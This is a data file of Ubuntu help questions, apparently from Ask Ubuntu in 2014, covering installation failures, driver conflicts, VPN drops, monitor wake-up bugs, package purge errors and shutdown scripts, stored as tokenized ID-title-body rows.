472442	system setting problem in ubuntu 14.04	i have a problem that my system setting is like guest system setting and do n't show many options and i 'm sure that i 'm not in guest mode in fact when i use guest session for the first time and then back to my own user after that the options of system setting are increase and after that i ca n't see normal system setting
472444	wine installation wants to remove nvidia-libopencl1-337	i am running kubuntu 14.04 lts and am using nvidia 337.19 driver . when i try to install wine 1.6 or 1.7 version ( those are the only two i tried ) konsole returns : the following packages will be removed nvidia-libopencl1-337 as you can see it wants to remove nvidia-libopencl1-337 package . i am a beginner , but after reading ubuntuupdates.org package description i suspect that it is not a good idea to proceed with removing . how to resolve this issue and install wine ?
472447	ca n't install lubuntu 14.04 on acer aspire 3000	i have formatted the acer aspire 3000 hdd . then tried to install lubuntu 14.04 . when installation is almost done , i get a warning saying that the lubuntu installer is damaged and therefore installation ca n't be preformed . what can i do ? i am new at linux-ubuntu . thanks
472448	how to allow non-admin users to format and repartition usb drives ?	i 'm using ubuntu on a work environment with several users . from time to time , as the administrator , i 'm asked to repartition or format a pendrive , because ubuntu wo n't allow the normal users to do so . is there any way to allow users to do these tasks ? limited to removable devices , of course . it seems that palimpsests/disks in ubuntu 14.04 uses udisks , which seems to be integrated at some point with policykit . maybe i can give that permissions with policykit rules ? how ? any other tool to allow repartition and format only removable devices should also be okay .
472449	can not purge roundup	i was trying to purge roundup , and aptitude has output the following error lines : update-rc.d : /etc/init.d/roundup exists during rc.d purge ( use -f to force ) dpkg : error processing roundup ( -- purge ) : subprocess installed post-removal script returned error exit status 1 processing triggers for ureadahead ... no apport report written because maxreports has already been reached errors were encountered while processing : roundup e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : aptitude 's logs do not help ; the following line is written there : important : this log only lists intended actions ; actions which fail due to dpkg problems may not be completed . but the following two lines appeared in apt/history.log : purge : roundup : amd64 ( 1.4.18-1.1 ) error : sub-process /usr/bin/dpkg returned an error code ( 1 ) roundup , by the way , is an issue-tracking system with command-line , web and e-mail interfaces . i do n't use it . system information : i am using ubuntu 12.04.4 lts , output of uname -srvmpio is : linux 3.2.0-61-generic # 93-ubuntu smp fri may 2 21:31:50 utc 2014 x86_64 x86_64 x86_64 gnu/linux as requested , i have tried the following command : sudo dpkg -p -- force-all -- force-remove-reinstreq roundup and the output was : removing roundup ... update-rc.d : /etc/init.d/roundup exists during rc.d purge ( use -f to force ) dpkg : error processing roundup ( -- purge ) : subprocess installed post-removal script returned error exit status 1 processing triggers for ureadahead ... errors were encountered while processing : roundup it may worth mentioning that this was done both before and after running the command sudo update-rc.d -f roundup remove update : update the failing attempts to purge , the state of the package , according to aptitude , was h , which means half-installed . i have tried to reinstall it ( was successful ) and remove it again , but with no luck - same error has appeared , and the state is back again half-installed .
472452	how to troubleshoot aptana studio in ubuntu 14.04	since my aptana did n't respond properly after ubuntu 14.04 upgradation , i tried the following steps for upgrading java : *sudo apt-get install libjpeg62 libwebkitgtk-1.0-0 git-core *sudo add-apt-repository ppa : webupd8team/java sudo apt-get update *sudo apt-get install oracle-java7-installer but still i found my aptana not working . it just crashes whenever i open it . steps to reproduce the issue : open aptana studio 3 open the project directory open the file to work until this step aptana did n't crash . when try to edit the line/by just placing cursor in the coding area , aptana dims out and quits . how to overcome this issue ? when i read log , i found this : ! session 2014-05-26 20:25:04.045 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - eclipse.buildid=3.4.2.201308081805 java.version=1.7.0_55 java.vendor=oracle corporation bootloader constants : os=linux , arch=x86_64 , ws=gtk , nl=en_in command-line arguments : -os linux -ws gtk -arch x86_64 ! entry org.eclipse.equinox.p2.transport.ecf 2 0 2014-05-26 20:25:57.151 ! message connection to http : //subclipse.tigris.org/update_1.4.x/p2.index failed on connection reset . retry attempt 0 started ! stack 0 java.net.socketexception : connection reset at java.net.socketinputstream.read ( socketinputstream.java:196 ) at java.net.socketinputstream.read ( socketinputstream.java:122 ) at java.io.bufferedinputstream.fill ( bufferedinputstream.java:235 ) at java.io.bufferedinputstream.read ( bufferedinputstream.java:254 ) at org.apache.commons.httpclient.httpparser.readrawline ( httpparser.java:78 ) at org.apache.commons.httpclient.httpparser.readline ( httpparser.java:106 ) at org.apache.commons.httpclient.httpconnection.readline ( httpconnection.java:1116 ) at org.apache.commons.httpclient.multithreadedhttpconnectionmanager $ httpconnectionadapter.readline ( multithreadedhttpconnectionmanager.java:1413 ) at org.apache.commons.httpclient.httpmethodbase.readstatusline ( httpmethodbase.java:1973 ) at org.apache.commons.httpclient.httpmethodbase.readresponse ( httpmethodbase.java:1735 ) at org.apache.commons.httpclient.httpmethodbase.execute ( httpmethodbase.java:1098 ) at org.eclipse.ecf.provider.filetransfer.httpclient.httpclientretrievefiletransfer $ gzipgetmethod.execute ( httpclientretrievefiletransfer.java:117 ) at org.apache.commons.httpclient.httpmethoddirector.executewithretry ( httpmethoddirector.java:398 ) at org.apache.commons.httpclient.httpmethoddirector.executemethod ( httpmethoddirector.java:171 ) at org.apache.commons.httpclient.httpclient.executemethod ( httpclient.java:397 ) at org.apache.commons.httpclient.httpclient.executemethod ( httpclient.java:346 ) at org.eclipse.ecf.provider.filetransfer.httpclient.httpclientretrievefiletransfer.performconnect ( httpclientretrievefiletransfer.java:1142 ) at org.eclipse.ecf.provider.filetransfer.httpclient.httpclientretrievefiletransfer.openstreams ( httpclientretrievefiletransfer.java:710 ) at org.eclipse.ecf.provider.filetransfer.retrieve.abstractretrievefiletransfer.sendretrieverequest ( abstractretrievefiletransfer.java:889 ) at org.eclipse.ecf.provider.filetransfer.retrieve.abstractretrievefiletransfer.sendretrieverequest ( abstractretrievefiletransfer.java:576 ) at org.eclipse.ecf.provider.filetransfer.retrieve.multiprotocolretrieveadapter.sendretrieverequest ( multiprotocolretrieveadapter.java:106 ) at org.eclipse.equinox.internal.p2.transport.ecf.filereader.sendretrieverequest ( filereader.java:349 ) at org.eclipse.equinox.internal.p2.transport.ecf.filereader.readinto ( filereader.java:295 ) at org.eclipse.equinox.internal.p2.transport.ecf.repositorytransport.download ( repositorytransport.java:87 ) at org.eclipse.equinox.internal.p2.transport.ecf.repositorytransport.download ( repositorytransport.java:137 ) at org.eclipse.equinox.internal.p2.repository.helpers.abstractrepositorymanager.loadindexfile ( abstractrepositorymanager.java:721 ) at org.eclipse.equinox.internal.p2.repository.helpers.abstractrepositorymanager.loadrepository ( abstractrepositorymanager.java:640 ) at org.eclipse.equinox.internal.p2.metadata.repository.metadatarepositorymanager.loadrepository ( metadatarepositorymanager.java:96 ) at org.eclipse.equinox.internal.p2.metadata.repository.metadatarepositorymanager.loadrepository ( metadatarepositorymanager.java:92 ) at org.eclipse.equinox.internal.p2.updatechecker.updatechecker.getavailablerepositories ( updatechecker.java:150 ) at org.eclipse.equinox.internal.p2.updatechecker.updatechecker.checkforupdates ( updatechecker.java:128 ) at org.eclipse.equinox.internal.p2.updatechecker.updatechecker $ updatecheckthread.run ( updatechecker.java:72 ) ! entry org.eclipse.equinox.p2.transport.ecf 4 1002 2014-05-26 20:25:59.328 ! message unable to read repository at http : //subclipse.tigris.org/update_1.4.x/content.xml . ! stack 0 java.net.socketexception : connection reset at java.net.socketinputstream.read ( socketinputstream.java:196 ) at java.net.socketinputstream.read ( socketinputstream.java:122 ) at java.io.bufferedinputstream.fill ( bufferedinputstream.java:235 ) at java.io.bufferedinputstream.read ( bufferedinputstream.java:254 ) at org.apache.commons.httpclient.httpparser.readrawline ( httpparser.java:78 ) at org.apache.commons.httpclient.httpparser.readline ( httpparser.java:106 ) at org.apache.commons.httpclient.httpconnection.readline ( httpconnection.java:1116 ) at org.apache.commons.httpclient.multithreadedhttpconnectionmanager $ httpconnectionadapter.readline ( multithreadedhttpconnectionmanager.java:1413 ) at org.apache.commons.httpclient.httpmethodbase.readstatusline ( httpmethodbase.java:1973 ) at org.apache.commons.httpclient.httpmethodbase.readresponse ( httpmethodbase.java:1735 ) at org.apache.commons.httpclient.httpmethodbase.execute ( httpmethodbase.java:1098 ) at org.apache.commons.httpclient.httpmethoddirector.executewithretry ( httpmethoddirector.java:398 ) at org.apache.commons.httpclient.httpmethoddirector.executemethod ( httpmethoddirector.java:171 ) at org.apache.commons.httpclient.httpclient.executemethod ( httpclient.java:397 ) at org.apache.commons.httpclient.httpclient.executemethod ( httpclient.java:346 ) at org.eclipse.ecf.provider.filetransfer.httpclient.httpclientfilesystembrowser.runrequest ( httpclientfilesystembrowser.java:227 ) at org.eclipse.ecf.provider.filetransfer.browse.abstractfilesystembrowser $ directoryjob.run ( abstractfilesystembrowser.java:69 ) at org.eclipse.core.internal.jobs.worker.run ( worker.java:54 )
472453	samba : map domain group to local one	i have a problem with mapping pure domain group to one existing on unix system . when i map nt domain account by default samba picks local sid - one that can be acquired via the command ; net getlocalsid instead of sid that comes from domain ; net getdomainsid this is the behavior that i do not understand . i can explicitly set the sid to the domain one . e.g . : net groupmap add sid= [ domain sid ] - [ rid ] ntgroup= [ domain group ] unixgroup= [ unix group ] type=l however the command getent group | grep 'domain group indicates this group to be domain one - gid created in accordance to rid backend in use , not the gid of 'unix group ' as expected . worth to mention i use the winbind . strange thing is that i already have such mapping in place for other 'domain group2 ' that getent group reports with gid of local unix group with all members of the 'domain group2 ' . now the question is how to populate such behavior for other of my groups ? ? ?
472454	stopped jobs error upon logout	there are times when i attempt to logout of ssh and i get something along the lines of : there are stopped jobs not knowing what this is , i end up force quitting putty with the exit button in the upper right . does n't seem to affect anything as i can login every time no issues . my questions are : what am i doing to cause certain `` jobs '' to stop ? how do i view them both stopped and running `` jobs '' ? how do i rectify the situation in order for me to logout
472455	update package list in repository after motherboard change	i just installed a new motherboard / microprocessor on my computer , i want to do an update to it using apt-get and i 've tried to do it from the gui as well . the issue is the package list still have amd ( which is my previous motherboard ) related packages and when i do the upgrade i get a 404 message with the list of the packages . this is an example : w : failed to fetch http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found , w : failed to fetch http : //ppa.launchpad.net/gwendal-lebihan-dev/cinnamon-stable/ubuntu/dists/trusty/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . what i 'm thinking about is just to remove the packages from the repository , is that the correct approach ? how do i delete those packages from the repository , and how do i update with the packages for the new motherboard ? edit : just to narrow the issue , this is what happens : when i do a repo update to install cinnamon on my computer as follows : sudo add-apt-repository ppa : gwendal-lebihan-dev/cinnamon-stable sudo apt-get update sudo apt-get install cinnamon ( i have n't run this yet ) the repo gets updated with an `` amd '' packages which is n't correct because i updated to an intel motherboard , why is that happening ?
472458	ubuntu 14.04 freezes after login , usb keybord/mouse disabled . computer has nvidiageforce graphics , amd athalon ii	after attempting to log in ubuntu becomes unresponsive , nothing works , including the power button . the only way to turn off the computer is to unplug and try again ... resulting in the same thing again . tried several reinstalls , but no change .
472460	step by step instruction for installing illustrator in ubuntu 14.04	i am totally new on ubuntu and want to install the illustrator on my laptop so any one can guide me step by step how to do it .
472464	ubuntu not connecting to wireless	i have ubuntu 12.04 installed on my dell laptop for couple of months ( did n't want it but my company forced it ) . rescently i am having some issues in connecting to some wireless networks . so far i have been able to connect to any wireless network . but at present i am not able to connect to my new home wireless , however with same laptop i am able to connect to office wireless and my friends wireless.the wireless is detected by ubuntu and is present in the list of connection but ca n't connect , if i click it it is instantly removed not even asking for password . i am able to connect to my home wireless through my iphone which means that there is no issue with my home wireless connection setup . even if i use the iphone as hotspot still not able to connect via ubuntu request some help .
472467	importerror : no module name pyssh	i run : sudo apt-get install python-pexpect on my ubuntu server 12.04 lts , i have both python2.7 and python3.1.3 i run this script using python3.1.3 script.py , then python script.py but i get this error : importerror : no module name : pyssh why does this happen ? after running the above command : will i be able to use pexpect both from python3.1.3 and python2.7 ? ( i even guessed i have python3.2 )
472471	installing video drivers	how can i install all video-drivers in ubuntu 14.04 lts 32 bit ? i have no idea what videocard i have . a guide for 64 bit is also welcome , thank you !
472474	14.04 - vpn established but ssh kills it	i have 14.04 lts installed on my laptop ( vmware image ) and i establish a vpn connection to my home . all that works fine , but when i want to use ssh on my laptop the vpn connection dies immediately . how do i get ssh to work over a vpn connection ? i do n't have this problem with a windows 7 guest connecting to the same vpn server . i see these errors in the syslog : may 26 08:30:51 ubuntu pptp [ 6284 ] : nm-pptp-service-6262 log [ logecho : pptp_ctrl.c:677 ] : echo request received . may 26 08:30:51 ubuntu pptp [ 6284 ] : nm-pptp-service-6262 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 6 'echo-reply' may 26 08:30:51 ubuntu pptp [ 6284 ] : nm-pptp-service-6262 log [ logecho : pptp_ctrl.c:677 ] : echo reply received . may 26 08:31:30 ubuntu pptp [ 6272 ] : nm-pptp-service-6262 warn [ decaps_gre : pptp_gre.c:331 ] : short read ( -1 ) : message too long may 26 08:31:30 ubuntu pptp [ 6284 ] : nm-pptp-service-6262 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) may 26 08:31:30 ubuntu pptp [ 6284 ] : nm-pptp-service-6262 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' may 26 08:31:30 ubuntu pptp [ 6284 ] : nm-pptp-service-6262 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) may 26 08:31:30 ubuntu pppd [ 6266 ] : modem hangup may 26 08:31:30 ubuntu pppd [ 6266 ] : connect time 1.6 minutes . may 26 08:31:30 ubuntu pppd [ 6266 ] : sent 6871 bytes , received 6572 bytes . may 26 08:31:30 ubuntu pppd [ 6266 ] : mppe disabled
472478	problem on reinstalling ubuntu software center	sudo apt-get install software-center reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_saucy_main_i18n_translation-en % 5fin e : the package lists or status file could not be parsed or opened .
472480	ubuntu 14.04 live cd while booting asks for username and password ( installing in virtual box )	guys i am trying to install ubuntu 14.04 in my virtual box , but it repeatedly asks for username and password . not able to solve this problem , none of my ubuntu .iso asked this before installation.. pls help..
472481	nothing is being saved after i logout each time	i just downloaded the ubuntu 14.04 version of linux and i feel really dumb . i am booting from a usb . every time i shut my computer down it does n't save anything that i had downloaded or any of my settings . every time i log out i try to log back in but i do n't know what my username or password is . please help
472483	how do i sync music to my android with clementine ?	i 'm using gnome flashback with ubuntu 14.04 . when i plug in my android 4.4 device by usb , it connects using mtp , and in nautilus it looks like this : so far , so good . in clementine , it appears under the devices section , like so : if i double click on it , it does this : ... and then it finishes like this : which all seems promising . i do actually have a bunch of songs on there that i had long ago copied over using banshee , but i wo n't hold it against clementine for not seeing them . maybe it wants it 's own special folders or something . in any case , from this point , i ca n't find any option for syncing any play lists or copying music to my device . i 've right-clicked on everything and gone through every menu i could find . i 've tried dragging and dropping . nothing works . frustratingly , when i do google searches on how to copy music from clementine to android , i get a lot of hits on how to get or use clementine 's android remote control app . how do i get clementine and my android device to sync ?
472486	how can i associate a html/php file with dreamweaver in wine - any example code for this specific case ?	i have dreamweaver installed and running successfully but how should it be associated with a php / html file for directly opening in the dreamweaver . can anybody explain with specific example for my dreamweaver8 application running in wine ?
472487	partion of hard disk	i 've install ubuntu latest version 14 . now i have completed with installation . but have not created disk partition . pleas guide me how to make partitions after installation
472488	ca n't install lubuntu desktop	i 'm at acer aspire one . trying to install lighter desktop environment . found this tutorial , for lxde : www.howtogeek.com/107368/how-to-install-the-lightweight-lxde-desktop-on-ubuntu/ but it did n't work : failed to fetch http : //ua.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-3.2.0-61_3.2.0-61.92_all.deb 404 not found failed to fetch http : //ua.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-3.2.0-61-generic_3.2.0-61.92_amd64.deb 404 not found failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin-data_2.10.3-0ubuntu1.4_all.deb 404 not found [ ip : 91.189.91.15 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/p/pidgin/pidgin_2.10.3-0ubuntu1.4_amd64.deb 404 not found [ ip : 91.189.91.15 80 ] any help please ?
472489	deja dup backup failure	i 'm trying to backup now with deja dup , but get a failure soon after starting . backup failed failed to retrieve share list from server : no such file or directory it does n't tell me which file or directory it can not find . i have no way to correct the error . and which server is providing the share list ? every thing looks good as to what folders to include , which folders to exclude and where to store the backup . any suggestions to correct the failure ?
472491	external laptop monitor stays black after screensaver powers it off	i have a dell xps 14 with two hdmi outputs and two external monitors . i 'm running 12.04 , fully updated as of 2014-05-26 . here 's what xrandr -q reports : xps % xrandr -q screen 0 : minimum 320 x 200 , current 3072 x 1080 , maximum 8192 x 8192 lvds1 connected 1152x864+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1600x900 60.0 + 40.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0* 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 1600x1200 60.0 1680x1050 60.0 1400x1050 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi2 connected 1920x1080+1152+0 ( normal left inverted right x axis y axis ) 520mm x 290mm 1920x1080 60.0*+ 1600x1200 60.0 1680x1050 60.0 1400x1050 60.0 1280x1024 75.0 60.0 1440x900 59.9 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 72.2 75.0 60.3 56.2 640x480 72.8 75.0 66.7 60.0 720x400 70.1 dp2 disconnected ( normal left inverted right x axis y axis ) here 's the problem : starting from a cold boot , both external monitors work ( e.g . i can place windows on them and see the windows ) if the screensaver kicks in and the monitors go to sleep ( not just the black screensaver , but all the way into power-save ) , there 's about a 50-50 chance that the left-hand monitor ( hdmi1 ) will wake up and only show black . the monitor is detected , and i can put windows there , move the mouse into the space that the monitor occupies , etc . i know that the monitor is working and connected : on-screen menus work , and it will recover if i reboot , so the monitor itself is n't broken i have verified that the input selection on the monitor is correct ( verified through on-screen menus ) ; also , the monitor will auto-select the correct input , so it seems like the laptop is driving something onto the output the monitor is n't powered off : the blue power-on indicator led is lit , and i can see that 's it 's being driven black , there 's just nothing being displayed . things i have tried : pm-suspend , counting to 10 , and then resuming will usually recover -- i will be able to see what 's on the monitor . i 'd generally prefer to not suspend , since this can cause problems with other things i have running . xset dpms force off , waiting until the monitor goes into power-save , then a few seconds more , and then wiggling the mouse to reactivate will sometimes cause a recovery , but this is much less reliable than suspending . xrandr -- output hdmi1 -- off , waiting for monitor to go into power-save , and then xrandr -- output hdmi1 -- auto ; this did n't cause a recovery in two attempts rebooting always recovers the monitor , but this is undesirable because i have to re-create my entire work session . and , as i was writing this question , i tried the dpms force off trick and when i wiggled the mouse to reactivate , that second monitor flashed horizontal `` rainbow '' stripes . turning off the power to the monitor and turning it back on did n't make the stripes go away , they seem to be driven by the laptop . another round of dpms off gives me a gray screen . this dmesg output ( i believe this coincides with what is described in the previous paragraph ) may be relevant : [ 517791.806047 ] hdmi hot plug event : codec=3 pin=5 presence_detect=0 eld_valid=1 [ 517791.806118 ] hdmi status : codec=3 pin=5 presence_detect=0 eld_valid=0 [ 517791.885438 ] hdmi hot plug event : codec=3 pin=6 presence_detect=0 eld_valid=1 [ 517791.885487 ] hdmi status : codec=3 pin=6 presence_detect=0 eld_valid=0 [ 517792.100397 ] [ drm : intel_disable_transcoder ] *error* failed to disable transcoder 2 [ 517803.480534 ] hdmi hot plug event : codec=3 pin=5 presence_detect=1 eld_valid=1 [ 517803.480598 ] hdmi status : codec=3 pin=5 presence_detect=1 eld_valid=1 [ 517803.484308 ] hdmi : detected monitor vx2453 series at connection type hdmi [ 517803.484316 ] hdmi : available speakers : fl/fr [ 517803.484325 ] hdmi : supports coding type lpcm : channels = 2 , rates = 32000 44100 48000 88200 96000 176400 192000 , bits = 16 20 24 [ 517803.592203 ] hdmi hot plug event : codec=3 pin=6 presence_detect=1 eld_valid=1 [ 517803.592266 ] hdmi status : codec=3 pin=6 presence_detect=1 eld_valid=1 [ 517803.595931 ] hdmi : detected monitor vx2453 series at connection type hdmi [ 517803.595941 ] hdmi : available speakers : fl/fr [ 517803.595951 ] hdmi : supports coding type lpcm : channels = 2 , rates = 32000 44100 48000 88200 96000 176400 192000 , bits = 16 20 24 how can i go about troubleshooting this ?
472495	( 32 ) ad-hoc mode is not supported by this device . - 13.10 on i5 nuc	not sure if this is an ubuntu issue or intel issue . any insights will be appreciated . i have an intel nuc ( d54250wyk ) w/ intel 7260 wireless adapter and ubuntu 13.10 . i can connect to my local wi-fi network without a problem , but can not create an ad-hoc network - ( 32 ) ad-hoc mode is not supported by this device . looks like the correct firmware is installed -rw-r -- r -- 1 root root 683236 jan 31 07:40 iwlwifi-7260-7.ucode -rw-r -- r -- 1 root root 674628 jan 31 07:47 iwlwifi-7260-8.ucode
472496	in which directory are the kernel source files and how can i recompile it ?	i have recently installed the latest kernel from linus ' git as an experiment . but then i needed an ftdi driver for the ft232 chip and it was missing from there . i tried to find a way to reinstall it , but it seemed easier to just go back to my previous kernel , that came along with my ubuntu install . but i am not being able to find the source files in my computer . i tried to download the files from the version i wanted from ubuntu 's git repository and then recompile it with the following commands : make localmodconfig make -j4 make modules_install make install but after rebooting my computer , my kernel version was still the one from linus ' repository .
472497	moving existing cacti to apache2 root folder	i have a running cacti installation on /var/www/html/cacti where is cacti installs by default on ubuntu 14.04lts . i would like to move cacti to apache 's root folder at /var/www/html/ without disrupting anything . is it possible ?
472500	shortcut to a website	is it possibole to make on the desktop shortcuts to some websites . using google chrome . the websites where i want to link are : facebook , my webmail and some others .
472505	run sh script on shut down to reduce volume	after having set up almost everything i wanted on my new laptop , there is still this one little thing that i can not get to work and that 's really annoying me : i would like to run a script at shut down such that the volume at boot/reboot is almost silent . here is what i 've done : i have a sh script looking like this # ! /bin/sh amixer -d pulse sset master 20 % placed in /etc/init.d/k99_set_volume.sh and have used ln -s /etc/init.d/k99_set_volume.sh /etc/rc0.d/k99_set_volume.sh ln -s /etc/init.d/k99_set_volume.sh /etc/rc6.d/k99_set_volume.sh to make the right links . unfortunately , the volume at boot is the same level as the previous session . i tried to explicitly insert a line with `` alsactl store '' into the script after reducing the volume , but to no effect . the script is executable and works when run in a terminal and the volume is indeed set in /var/lib/alsa/asound.state . also , the script runs at shut down , i checked that . i do n't know if the number 99 is right , though . i know there are some posts on that topic , but i would really like to find a solution with a script at shut down/boot and the posts i 've read suggest to do pretty much what i do ? the full output from pacmd list-sinks is 2 sink ( s ) available . index : 0 name : alsa_output.pci-0000_00_03.0.hdmi-stereo driver : module-alsa-card.c flags : hardware decibel_volume latency dynamic_latency state : suspended suspend cause : idle priority : 9950 volume : 0 : 20 % 1 : 20 % 0 : -41,94 db 1 : -41,94 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : yes current latency : 0,00 ms max request : 0 kib max rewind : 0 kib monitor source : 0 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0,00 ms ; range is 0,50 .. 371,52 ms card : 0 alsa_card.pci-0000_00_03.0 module : 5 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` hdmi 0 '' alsa.id = `` hdmi 0 '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 3 '' alsa.card = `` 0 '' alsa.card_name = `` hda intel hdmi '' alsa.long_card_name = `` hda intel hdmi at 0xf7d1c000 irq 61 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:03.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:03.0/sound/card0 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 0a0c '' device.form_factor = `` internal '' device.string = `` hdmi:0 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` hdmi-stereo '' device.profile.description = `` digital stereo ( hdmi ) '' device.description = `` built-in audio digital stereo ( hdmi ) '' alsa.mixer_name = `` intel haswell hdmi '' alsa.components = `` hda:80862807,80860101,00100000 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : hdmi-output-0 : hdmi / displayport ( priority 5900 , latency offset 0 usec , available : no ) properties : device.icon_name = `` video-display '' active port : hdmi-output-0 index : 1 name : alsa_output.pci-0000_00_1b.0.analog-stereo driver : module-alsa-card.c flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency state : suspended suspend cause : idle priority : 9959 volume : 0 : 20 % 1 : 20 % 0 : -41,94 db 1 : -41,94 db balance 0,00 base volume : 100 % 0,00 db volume steps : 65537 muted : no current latency : 0,00 ms max request : 0 kib max rewind : 0 kib monitor source : 1 sample spec : s16le 2ch 44100hz channel map : front-left , front-right stereo used by : 0 linked by : 0 configured latency : 0,00 ms ; range is 0,50 .. 371,52 ms card : 1 alsa_card.pci-0000_00_1b.0 module : 6 properties : alsa.resolution_bits = `` 16 '' device.api = `` alsa '' device.class = `` sound '' alsa.class = `` generic '' alsa.subclass = `` generic-mix '' alsa.name = `` cx20751/2 analog '' alsa.id = `` cx20751/2 analog '' alsa.subdevice = `` 0 '' alsa.subdevice_name = `` subdevice # 0 '' alsa.device = `` 0 '' alsa.card = `` 1 '' alsa.card_name = `` hda intel pch '' alsa.long_card_name = `` hda intel pch at 0xf7d18000 irq 60 '' alsa.driver_name = `` snd_hda_intel '' device.bus_path = `` pci-0000:00:1b.0 '' sysfs.path = `` /devices/pci0000:00/0000:00:1b.0/sound/card1 '' device.bus = `` pci '' device.vendor.id = `` 8086 '' device.vendor.name = `` intel corporation '' device.product.id = `` 9c20 '' device.product.name = `` lynx point-lp hd audio controller '' device.form_factor = `` internal '' device.string = `` front:1 '' device.buffering.buffer_size = `` 65536 '' device.buffering.fragment_size = `` 32768 '' device.access_mode = `` mmap+timer '' device.profile.name = `` analog-stereo '' device.profile.description = `` analog stereo '' device.description = `` built-in audio analog stereo '' alsa.mixer_name = `` conexant cx20751/2 '' alsa.components = `` hda:14f1510f,104315dd,00100100 '' module-udev-detect.discovered = `` 1 '' device.icon_name = `` audio-card-pci '' ports : analog-output-speaker : speakers ( priority 10000 , latency offset 0 usec , available : unknown ) properties : device.icon_name = `` audio-speakers '' analog-output-headphones : headphones ( priority 9000 , latency offset 0 usec , available : no ) properties : device.icon_name = `` audio-headphones '' active port : analog-output-speaker
472508	fresh installation only shows a `` dash ''	i have just installed ubuntu 14.04 on my old macbook . installation was succsessfull . there was an error befor booting : efi was n't loadable . i fixed that . but ubuntu does n't start . i only see a dos cursor ( do n't know the name ) `` - `` < -- and it is blinking . thats all . i tried changing my touchpad configuration ... because that worked before . ( do n't ask why . the world is mysterious . ) does anyone have an idea ? : ) greetings meee ps : 12.04 works just fine
472510	the device is locked . enter the passcode	i sometimes plug my iphone to my ubuntu laptop just to charge it . i 'm not trying to sync or anything , just charge . i get the message `` the device ' ... ' is locked . enter the passcode on the device and click 'try again ' '' . i do n't want to unlock , i just want to charge . clicking cancel opens the popup again in a loop . tired , i decided to unlock it just to leave me alone ... but i instead got a mount error and the popup came back in the loop . i just want to charge ! !
472513	enter before continue	i make some scripts to install programs automatic but is there a option to do the following . press enter to continue or any other key to skip and go to the next thing ? for example , the script will install keylock indicator and touchpad indicator but you want only the touchpad indicator .
472514	ubuntu 12.04 lts - consistent boot and desktop problems	i finally found it in myself to make the switch to ubuntu from windows xp ( one month after support had ended for it ) . i am enjoying my time with ubuntu , but i have been having some issues that are really annoying me and i would like to see if i could solve . more specifically , when i boot in to ubuntu , one of several things may happen : it does not boot . it gets to the purple screen where it 's supposed to show the text `` ubuntu '' with loading sphere bar underneath , but neither the logo nor the bar show and it never loads ( waited for several minutes ) . it boots , and i log in , but the whole desktop is really slow . i even tried to wait at login screen and after login screen to give it a chance to `` warm up '' to no avail . it 's very slow throughout the time using it in that session and does not speed up . it boots just fine , no mouse lag , no keyboard lag , no browser or window switch lag , nothing wrong . ( this usually occurs upon the 2-4th time of booting . ) this is n't a huge issue , it 's just really , really inconsistent and annoying if i have to boot up the computer quickly . it 's a brand new hdd , installed ubuntu linux 12.04 lts from the dvd i got with the official ubuntu book , and i think it 's possible i have had these problems before . my hardware specifications : motherboard : p4c800-e deluxe cpu : intel pentium 4 3.00 ghz ( single core ) memory : 3gb ddr ram video card : ati radeon hd 4600 series ( card is specifically 4650 ) other notes : can provide more details if necessary . using a vga adapter to plug my vga monitor in to the card as it only has div ports . i do n't anticipate this to contribute to the problem . using a logitech keyboard and mouse ( g15 keyboard , m705 wireless mouse ) . i have not updated the packages via package manager yet , if it may help with the issue i will try that , but i just do n't think the packages are related to the problem . that and i do n't want to get ahead of my book just yet . ubuntu runs great when it boots up just fine , even better than windows ever did . the problem i am having is that it is not consistent , and many , many times my mouse will not work upon booting up so i have to re-plug it in from the back end ( frontal ports on chassis do not work anymore ) , which causes my back to ache from having to do it multiple times . i would appreciate any help or assistance anyone can give me . as i said , if more information is required , just let me know what you need to know , and i will do my best to get it . it 's an older rig , but ubuntu is already working great for it , so i have faith that something just went wrong that i can manage to fix . thank you for reading and i look forward to any help you could offer . : )
